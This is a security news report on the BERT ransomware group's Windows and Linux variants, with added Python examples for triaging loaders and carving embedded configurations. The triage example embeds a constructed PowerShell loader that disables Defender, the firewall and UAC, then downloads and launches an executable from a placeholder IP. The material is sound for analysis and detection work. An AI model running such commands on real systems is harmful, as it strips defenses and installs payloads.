Security analysts at Trend Micro have documented a previously unknown ransomware group, now tracked as BERT, that deploys multi-threaded ransomware variants against victims across Asia, Europe, and the United States. Its targets include the healthcare, technology, and event-services sectors, marking the group as a growing force in the ransomware ecosystem.
“BERT (tracked by Trend Micro as Water Pombero) is a newly emerged ransomware group targeting both Windows and Linux platforms,” the report confirms.
On Windows systems, BERT's malware is deployed through a PowerShell loader (start.ps1) that elevates privileges, disables defenses, and then downloads the payload (payload.exe) from an open directory hosted on an IP address in ASN 39134, a Russian infrastructure provider.
“The PowerShell script escalates privileges, disables Windows Defender, the firewall, and user account control (UAC), then downloads and executes the ransomware,” the report explains.
The malware terminates services associated with web servers and databases before encryption begins (a common step that releases file locks so those files can be encrypted), encrypts files with AES, appends the .encryptedbybert extension, and drops a ransom note.
Trend Micro also highlights the presence of Russian-language comments within the PowerShell script—potentially indicating the origin or coding influence of the threat actors.
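The loader behaviour described above (privilege escalation, tampering with Defender, the firewall and UAC, then a download-and-execute cradle) together with the Russian-language comments gives an analyst a compact static triage signature. The following is an added example, not code from Trend Micro or from the BERT sample: it scans a PowerShell script for those behaviours and for Cyrillic text in comments. The embedded script is constructed for illustration and uses common defense-evasion one-liners; it is not the real start.ps1, and the 203.0.113.10 address is a documentation-range placeholder.

```python
"""Static triage of a PowerShell loader for the behaviours attributed to
BERT's start.ps1: defense tampering, download-and-execute, and Cyrillic
comments.  Added example; the sample script below is constructed."""
import re
from typing import Dict, List

# Constructed stand-in for a loader.  The commands are ordinary, widely
# seen defense-evasion one-liners, not copied from the BERT sample.
SAMPLE_LOADER = r"""
# отключаем защиту
Set-MpPreference -DisableRealtimeMonitoring $true
netsh advfirewall set allprofiles state off
reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v EnableLUA /t REG_DWORD /d 0 /f
# качаем и запускаем
Invoke-WebRequest -Uri "http://203.0.113.10/payload.exe" -OutFile "$env:TEMP\payload.exe"
Start-Process "$env:TEMP\payload.exe"
"""

# (label, regex).  Case-insensitive: PowerShell cmdlets, netsh and reg are.
RULES = [
    ("defender_tamper", re.compile(r"Set-MpPreference\s+-Disable\w+", re.I)),
    ("firewall_off",    re.compile(r"netsh\s+advfirewall\s+set\s+\w+\s+state\s+off", re.I)),
    ("uac_disable",     re.compile(r"EnableLUA\s+/t\s+REG_DWORD\s+/d\s+0", re.I)),
    ("download_cradle", re.compile(r"(Invoke-WebRequest|iwr|wget|curl|DownloadFile|DownloadString)\b.*https?://", re.I)),
    ("exec_dropped",    re.compile(r"Start-Process\b.*\.exe", re.I)),
]

COMMENT_RE = re.compile(r"^\s*#(?!>)(.*)$", re.M)   # '# ...' line comments ('#>' closes a block)
BLOCK_COMMENT_RE = re.compile(r"<#(.*?)#>", re.S)   # '<# ... #>' block comments
CYRILLIC_RE = re.compile(r"[\u0400-\u04FF]")        # Cyrillic Unicode block
URL_RE = re.compile(r"https?://[^\s\"']+")


def comments(script: str) -> List[str]:
    """Return the text of all line and block comments in the script."""
    return ([m.strip() for m in COMMENT_RE.findall(script)]
            + [m.strip() for m in BLOCK_COMMENT_RE.findall(script)])


def triage(script: str) -> Dict[str, object]:
    """Match each rule against every line; collect URLs and Cyrillic comments.

    'loader_pattern' is a crude verdict: at least one defense-tampering
    rule plus a download cradle, the combination the report describes."""
    hits: Dict[str, List[str]] = {}
    for label, rx in RULES:
        matched = [ln.strip() for ln in script.splitlines() if rx.search(ln)]
        if matched:
            hits[label] = matched
    tamper = {"defender_tamper", "firewall_off", "uac_disable"}
    return {
        "hits": hits,
        "urls": URL_RE.findall(script),
        "cyrillic_comments": [c for c in comments(script) if CYRILLIC_RE.search(c)],
        "loader_pattern": bool(set(hits) & tamper) and "download_cradle" in hits,
    }


if __name__ == "__main__":
    for key, value in triage(SAMPLE_LOADER).items():
        print(f"{key}: {value}")
```

The rules are deliberately narrow so that a hit is worth a human look; a script that disables Defender and pulls an executable over HTTP from a bare IP is almost never legitimate administration. Comment-language detection is weak evidence on its own (as the report itself hedges), so it is reported separately rather than folded into the verdict.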
BERT's Linux variant, discovered in May, is more aggressive still. It spawns up to 50 concurrent threads to encrypt target directories quickly and can forcibly shut down ESXi virtual machines to maximize impact, a standard step in ESXi-focused ransomware, since a running VM keeps its disk files open and therefore out of the encryptor's reach.
“When executed without command line parameters, it will proceed to shutdown virtual machines… [and] force the termination of all running VM processes,” Trend Micro warns.

The Linux variant appends the .encrypted_by_bert extension and drops a Base64-encoded ransom note, displaying a banner that summarizes the encrypted files.
Its modular design uses a JSON-formatted configuration embedded in the binary, holding the encryption keys, target extensions, and ransom note text, a technique common to modern ransomware toolkits.
“This version uses a JSON-formatted configuration embedded in the binary—a typical trait of most modern ransomware,” the report states.
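Because the configuration is a plain JSON document compiled into the executable, the first thing an analyst usually does with such a sample is carve that document out without running the binary. The following is an added example, not code from Trend Micro: it scans a byte blob for brace-balanced, string-aware spans that parse as JSON objects, skips nested spans inside an accepted one, and Base64-decodes a note field. The blob and the field names (extension, note_b64, kill, threads) are constructed and hypothetical; BERT's real configuration keys are not given on this page.

```python
"""Carve an embedded JSON configuration out of a binary blob.
Added example; the blob and field names below are constructed."""
import base64
import json
from typing import Iterator, List, Tuple


def candidate_json_spans(blob: bytes) -> Iterator[Tuple[int, int]]:
    """Yield (start, end) offsets of brace-balanced spans starting at '{'.

    Braces inside JSON string literals are ignored, and a candidate is
    abandoned on any control byte (other than tab/CR/LF), which marks the
    surrounding compiled data rather than text."""
    n = len(blob)
    i = 0
    while i < n:
        if blob[i] != ord("{"):
            i += 1
            continue
        depth, in_str, esc = 0, False, False
        j = i
        while j < n:
            c = blob[j]
            if c < 0x20 and c not in (0x09, 0x0A, 0x0D):
                break                               # binary junk: give up on this start
            if in_str:
                if esc:
                    esc = False
                elif c == ord("\\"):
                    esc = True
                elif c == ord('"'):
                    in_str = False
            elif c == ord('"'):
                in_str = True
            elif c == ord("{"):
                depth += 1
            elif c == ord("}"):
                depth -= 1
                if depth == 0:
                    yield (i, j + 1)
                    break
            j += 1
        i += 1


def carve_json_configs(blob: bytes, min_keys: int = 2) -> List[Tuple[int, dict]]:
    """Return (offset, dict) for each span that parses as a JSON object with
    at least min_keys keys.  Spans nested inside an accepted one are skipped."""
    found: List[Tuple[int, dict]] = []
    last_end = 0
    for start, end in candidate_json_spans(blob):
        if start < last_end:
            continue
        try:
            obj = json.loads(blob[start:end].decode("utf-8"))
        except (UnicodeDecodeError, json.JSONDecodeError):
            continue
        if isinstance(obj, dict) and len(obj) >= min_keys:
            found.append((start, obj))
            last_end = end
    return found


def decode_ransom_note(cfg: dict, key: str = "note_b64") -> str:
    """Base64-decode the note stored under a (hypothetical) key name."""
    return base64.b64decode(cfg[key]).decode("utf-8")


# Constructed blob: fake ELF header, junk that contains stray braces and
# quotes, an unbalanced decoy, the hypothetical config, then trailing bytes.
_NOTE = "Your files are encrypted. Contact us to restore them."
_CONFIG = {
    "extension": ".encrypted_by_bert",
    "note_b64": base64.b64encode(_NOTE.encode()).decode(),
    "kill": ["mysqld", "httpd"],
    "threads": 50,
}
SAMPLE_BLOB = (
    b"\x7fELF\x02\x01\x01\x00" + bytes(range(256)) * 2
    + b"{not json{"
    + json.dumps(_CONFIG).encode()
    + b"\x00\x00trailing\x90\x90"
)

if __name__ == "__main__":
    for offset, cfg in carve_json_configs(SAMPLE_BLOB):
        print(f"config at offset {offset:#x}: {sorted(cfg)}")
        print("note:", decode_ransom_note(cfg))
```

Real samples often store the configuration encrypted or compressed rather than as plain text; when the carver finds nothing, that is the next thing to check, not evidence that no configuration exists.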
Trend's investigation revealed that older variants of BERT relied on a two-stage encryption process, first collecting file paths, then encrypting them. Newer samples instead push discovered paths into a ConcurrentQueue and spawn a DiskWorker per drive, so encryption starts as soon as files are found rather than after enumeration completes.
“This enables the ransomware to begin encrypting files as soon as they are discovered, unlike the older version,” the researchers explain.
Trend Micro's analysts note code similarities between BERT and REvil's Linux variant, which was publicly leaked in 2021. These connections suggest the group may have built on an existing ransomware codebase previously used in high-profile attacks against ESXi and Linux systems.
“Further investigation suggests that the group may have derived from the Linux variant of REvil,” the report adds.